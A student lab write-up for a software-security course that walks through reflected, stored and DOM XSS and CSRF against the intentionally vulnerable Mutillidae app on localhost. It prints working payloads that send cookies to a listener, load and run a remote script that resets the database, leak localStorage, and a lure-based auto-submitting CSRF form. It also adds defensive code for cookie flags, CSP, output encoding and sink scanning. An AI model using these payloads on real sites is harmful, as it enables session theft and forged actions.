FIT5003 Cross-Site Scripting XSS

This article relates to FIT5003 2020S2 Lab 10. The main topics these labs cover are the three types of XSS and CSRF. We will discuss how to exploit each vulnerability and how to defend against the attacks.

Week 10 Lab - XSS

Environment Setup

Start the XAMPP server with the command below:

sudo /opt/lampp/lampp start

3 Types of XSS

Main damages:

  1. access cookies, session tokens, or other sensitive information.

  2. rewrite HTML page.

There are 3 types of XSS: Reflected, Stored, DOM.

Reflected XSS

Reflected XSS, image from https://hydrasky.com/networksecurity/cross-site-scriptingxss-attack/

Task One: Popup windows

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XSS)' --> 'Reflected(First order)' --> 'DNS Lookup'

Mission:

Enter a small script into the "Hostname/IP" input to pop up an alert window.

Answer:

We first check the source of this page by pressing "Ctrl+U". There we can find the input that we just typed. For example, I entered "fit5003":

<div class="report-header" ReflectedXSSExecutionPoint="1">Results for fit5003</div><pre class="report-header" style="text-align:left;">Server:		127.0.1.1
Address: 127.0.1.1#53

Non-authoritative answer:
*** Can't find fit5003: No answer

So we can see that the input is inserted directly inside the <div> block, without any encoding. If we replace "fit5003" with a script, the browser executes it as soon as the page is rendered. This is reflected XSS: the payload travels in the request and is echoed straight back in the response.

I will use the following code to attack the website:

<script>alert("So long and thanks for all the fish!")</script>

Results:

Task Two: Display a user's cookie

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XSS)' --> 'Reflected(First order)' --> 'DNS Lookup'

Mission:

Display a specific user's cookie.

Answer:

  1. Register a username and password on the register page. For example, I use Hitchhiker & 42 as username & password.

  2. Log in as Hitchhiker, go to the DNS Lookup page, and submit the script below:

<script>alert(document.cookie)</script>

Results:

Task Three: Attack from the attacker's port

I'm too lame to open another VM, so I'll just quickly go through this part without the result image.

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XSS)' --> 'Reflected(First order)' --> 'DNS Lookup'

Mission:

Send a specific user's cookie to the attacker's server.

Answer:

Go to the DNS Lookup page and submit the script below:

<script>document.write("<img src=http://127.0.0.1:5555?c="+document.cookie+">");</script>

The browser requests the image URL, so the cookie reaches the attacker's server in the query string.
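Both cookie tasks work only because document.cookie can read the session cookie. The defence is on the server, in the attributes of the Set-Cookie header: HttpOnly hides the cookie from script, Secure keeps it off plain HTTP, and SameSite stops it being attached to cross-site requests (which also blunts the CSRF form at the end of this page). The following is an added example, not code from the lab or from Mutillidae: a small audit of Set-Cookie headers. The header strings are constructed for the example.

```javascript
// Parse one Set-Cookie header value into name, value and a map of attributes
// (attribute names lower-cased; flag attributes such as HttpOnly map to true).
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf("=");
  const cookie = {
    name: eq === -1 ? parts[0] : parts[0].slice(0, eq),
    value: eq === -1 ? "" : parts[0].slice(eq + 1),
    attributes: {},
  };
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return cookie;
}

// Return the list of findings for a session cookie. An empty list means the
// cookie carries every attribute we expect on a session identifier.
function auditSessionCookie(header) {
  const { attributes } = parseSetCookie(header);
  const findings = [];
  if (attributes.httponly !== true) {
    findings.push("missing HttpOnly: document.cookie can read it, so any XSS can exfiltrate it");
  }
  if (attributes.secure !== true) {
    findings.push("missing Secure: cookie is sent over plaintext HTTP");
  }
  const sameSite = typeof attributes.samesite === "string" ? attributes.samesite.toLowerCase() : "";
  if (sameSite !== "lax" && sameSite !== "strict") {
    findings.push("SameSite not Lax/Strict: cookie is attached to cross-site POSTs (CSRF)");
  }
  return findings;
}

// Constructed sample headers: a weak PHP-style session cookie and a hardened one.
const weakHeader = "PHPSESSID=abc123; path=/";
const hardenedHeader = "PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax";

console.log(auditSessionCookie(weakHeader));     // three findings
console.log(auditSessionCookie(hardenedHeader)); // []
```

Run it over the Set-Cookie headers a target application actually returns (copied from the browser's network panel or from Burp) to see which of the three protections the session cookie is missing.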

Advanced Reflected XSS

We now use reflected XSS to trick a client into downloading and executing a JavaScript file hosted on the attacker's server.

To better understand the process, we first open Burp Suite's intercepting proxy and capture the GET request to http://localhost/mutillidae/set-up-database.php.

We can then write a script that issues the same request:

function resetDB()
{
    var uri = "http://localhost/mutillidae/set-up-database.php"; // the database set-up page captured in Burp
    var xhr = new XMLHttpRequest(); // create a new HTTP request object
    xhr.open("GET", uri); // prepare a GET request to uri
    xhr.send(null); // send the request; a GET has no body, so the argument is null
}
resetDB();

We save this file as resetDB.js.

Task: Download and execute a file from the attacker's server

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XSS)' --> 'Reflected(First order)' --> 'DNS Lookup'

Mission:

Trick a client into downloading and executing a JavaScript file from the attacker's server.

Answer:

  1. Run

python3 -m http.server 9090

in the directory of the attacker's server to serve resetDB.js on that port.

  2. Register a new account. This is for checking whether the attack succeeded.

  3. Go to the DNS Lookup page and enter the script:

<script src="http://127.0.0.1:9090/resetDB.js"></script>

  4. After submitting, check whether the account created in step 2 still exists.

Results:

This shows the database has been reset, which means resetDB.js was executed successfully.
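The browser fetched resetDB.js from 127.0.0.1:9090 because nothing told it not to. A Content-Security-Policy header with a script-src directive does exactly that: the browser refuses scripts from any origin the policy does not list. The following is an added example, not code from the lab or from Mutillidae: a minimal evaluator that answers "would this policy let this script load?". It handles only what is needed here (script-src with a fall-back to default-src, 'self', 'none', and host sources with an optional scheme, port and leading "*." wildcard); real CSP has more source expressions such as nonces and hashes. The policy strings and the app.js path are constructed for the example, and a source without an explicit port is simplified to match only the scheme's default port.

```javascript
// Parse "directive src src; directive src" into a map of directive -> [sources].
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Host source expression: [scheme://]host[:port][/path]
const HOST_SOURCE = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:\/]+)(?::(\d+))?(?:\/.*)?$/i;

// Does one source expression match the script URL? pageOrigin is the origin
// of the document the policy was delivered with (needed for 'self').
function sourceMatches(source, scriptUrl, pageOrigin) {
  const target = new URL(scriptUrl);
  if (source === "'self'") return target.origin === pageOrigin;
  if (source.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes: never a host match
  const m = HOST_SOURCE.exec(source);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && scheme.toLowerCase() + ":" !== target.protocol) return false;
  const hostOk =
    host === "*" ||
    (host.startsWith("*.")
      ? target.hostname.toLowerCase().endsWith(host.slice(1).toLowerCase())
      : target.hostname.toLowerCase() === host.toLowerCase());
  // Simplification: no explicit port in the source matches only the scheme's default port.
  const portOk = port === undefined ? target.port === "" : port === target.port;
  return hostOk && portOk;
}

// Would the policy allow loading scriptUrl into a page served from pageOrigin?
function scriptAllowed(cspHeader, pageOrigin, scriptUrl) {
  const policy = parseCsp(cspHeader);
  const sources = policy["script-src"] || policy["default-src"];
  if (!sources) return true; // no governing directive: the browser loads anything
  return sources.some((s) => sourceMatches(s, scriptUrl, pageOrigin));
}

// Constructed walk-through: the injected script from the task and an own script.
const pageOrigin = "http://localhost";
const injected = "http://127.0.0.1:9090/resetDB.js";
const own = "http://localhost/mutillidae/javascript/app.js"; // hypothetical path

const noPolicy = "";                                       // what the lab server sends
const strict = "default-src 'self'; script-src 'self'";    // minimal hardening

console.log(scriptAllowed(noPolicy, pageOrigin, injected)); // true
console.log(scriptAllowed(strict, pageOrigin, injected));   // false
console.log(scriptAllowed(strict, pageOrigin, own));        // true
```

Note that a policy allowing 'self' still runs an inline `<script>` only if 'unsafe-inline' is also listed, so the same header would block the alert payloads of the earlier tasks as well; the evaluator above deliberately covers the external-script case only.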

Stored XSS

Before writing this article, I had done all the tasks in Lab 10. Unfortunately, I find that I can't connect to the database now, so I can only describe the following attacks. But I will still provide the code and explanation.

Stored XSS, image from https://hydrasky.com/network-security/crosssite-scriptingxss-attack/

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XSS)' --> 'Persistent(Second Order)' --> 'Add to your blog'

Missions:

  1. Popup window

  2. Steal cookie

Answers:

  1. Register as a new user.

  2. Go to the Add to your blog page and submit the script below:

<script>alert("Hello!")</script>

When we open the blog, the "Hello!" window pops up.

  3. If we change the script to:

<script>alert(document.cookie)</script>

then the content of the popup window is the user's cookie.
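The fix is the same for the reflected case (the hostname echoed into the results <div>) and the stored case (a blog entry written into the page every time the blog is viewed): HTML-encode the value at the moment it is inserted into the page, so the browser shows a `<script>` payload as text instead of running it. The following is an added example, not code from the lab or from Mutillidae; renderUnsafe and renderSafe are hypothetical stand-ins for the page's own rendering, and the payload string is the one from Task One.

```javascript
// Encode the five characters that can change meaning in an HTML text or
// attribute context. Everything else is left alone.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
  })[ch]);
}

// Vulnerable rendering: raw concatenation, which is what the lab page does.
function renderUnsafe(hostname) {
  return '<div class="report-header">Results for ' + hostname + "</div>";
}

// Hardened rendering: encode on output, where the value enters HTML.
function renderSafe(hostname) {
  return '<div class="report-header">Results for ' + escapeHtml(hostname) + "</div>";
}

// Crude check used below: does the rendered HTML contain a live <script>
// element? A real test would parse the HTML; a regex is enough to show the
// difference between the two renderers.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample input: the payload from Task One.
const payload = '<script>alert("So long and thanks for all the fish!")</script>';

console.log(renderUnsafe(payload)); // live script element in the page
console.log(renderSafe(payload));   // &lt;script&gt;... displayed as text
```

The encoding is context-specific: this table is correct for text between tags and for quoted attribute values, but a value placed inside a JavaScript string, a URL, or a CSS rule needs the encoding for that context instead.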

DOM XSS

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XSS)' --> 'Persistent(Second Order)' --> 'Add to your blog'

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XSS)' --> 'DOM-based' --> 'HTML5 Web Storage'

'Others' --> 'Data Capture Pages' --> 'View Captured Data'

Mission 1: Add a blog entry on Add to your blog that leaks all of the local storage.

Answers:

<script>
try {
    var m = "";
    var l = window.localStorage;
    // walk every key in local storage and build "key=value;" pairs
    for (var i = 0; i < l.length; i++) {
        var lKey = l.key(i);
        m += lKey + "=" + l.getItem(lKey) + ";\n";
    }
    // navigate to the capture page with the dump in the query string
    document.location = "http://localhost/mutillidae/capture-data.php?html5storage=" + m;
}
catch (e) {
    alert(e.message);
}
</script>

Add this to the blog, then check the View Captured Data page.

Mission 2: Add values to HTML5 Web Storage

Answers:

<script>
// dump every key/value pair in local storage into an alert
function dumpStorage() {
    try {
        var m = "";
        var l = window.localStorage;
        for (var i = 0; i < l.length; i++) {
            var lKey = l.key(i);
            m += lKey + "=" + l.getItem(lKey) + ";\n";
        }
        alert(m);
    }
    catch (e) {
        alert(e.message);
    }
}

dumpStorage();                      // contents before the change
localStorage.setItem("abc", "123"); // add a new key "abc" with value "123" to local storage
dumpStorage();                      // contents after the change: "abc=123" is now listed
</script>

Add this to the blog, then check the HTML5 Web Storage page.
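Both missions, and the cookie payload in Task Three, end in a DOM sink: an assignment to document.location or a call to document.write with attacker-controlled data. When reviewing a site's own scripts, the first defensive step is to find every such sink and check what data can reach it. The following is an added example, not code from the lab or from Mutillidae: a regex scan over JavaScript source that reports the line of each sink it recognises. It is a lead generator for manual review, not a parser. The sample scripts are constructed for the example (the first one re-states the Mission 1 payload).

```javascript
// Sinks to flag, each with the pattern that recognises it on one line.
// The "[^=]" after "=" rules out comparisons such as "location === x".
const SINK_PATTERNS = [
  { sink: "location assignment", re: /\b(?:document|window)?\.?location(?:\.href)?\s*=[^=]/ },
  { sink: "document.write", re: /\bdocument\.write(?:ln)?\s*\(/ },
  { sink: "innerHTML/outerHTML assignment", re: /\.(?:inner|outer)HTML\s*=[^=]/ },
  { sink: "eval", re: /\beval\s*\(/ },
];

// Scan one script's source; return [{line, sink, text}] for every matching line.
function findDomSinks(source) {
  const hits = [];
  source.split("\n").forEach((text, index) => {
    for (const { sink, re } of SINK_PATTERNS) {
      if (re.test(text)) hits.push({ line: index + 1, sink, text: text.trim() });
    }
  });
  return hits;
}

// Constructed sample 1: the localStorage-leaking payload from Mission 1.
const leakingScript = [
  "var m = '';",
  "var l = window.localStorage;",
  "for (var i = 0; i < l.length; i++) { m += l.key(i) + '=' + l.getItem(l.key(i)) + ';'; }",
  "document.location = 'http://localhost/mutillidae/capture-data.php?html5storage=' + m;",
].join("\n");

// Constructed sample 2: reads storage but never sends it anywhere.
const benignScript = [
  "var theme = window.localStorage.getItem('theme') || 'light';",
  "document.body.className = theme;",
].join("\n");

console.log(findDomSinks(leakingScript)); // one hit: line 4, location assignment
console.log(findDomSinks(benignScript));  // []
```

A hit is only a starting point: the reviewer then traces what feeds the sink (here, everything in localStorage) and decides whether that data is attacker-influenced. The real lesson of the HTML5 Web Storage task is that anything a page keeps in localStorage is readable by any script running on that origin, so secrets do not belong there.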

Cross Site Request Forgery(CSRF)

Cross Site Request Forgery Attacks (image from https://hydrasky.com/network-security/crosssite-request-forgery-csrf/)

Script to add on the Add to your blog page:

<form id="f"
      action="index.php?page=add-to-your-blog.php"
      method="post"
      enctype="application/x-www-form-urlencoded">
  <input type="hidden" name="csrf-token" value="best-guess"/>
  <input type="hidden" name="blog_entry" value="I like FIT5003 Software Security"/>
  <input type="hidden" name="add-to-your-blog-php-submit-button" value="TESTING"/>
</form>
<i onmouseover="window.document.getElementById('f').submit()">
Tick Here to Obtain Higher Mark for Assignment 1
</i>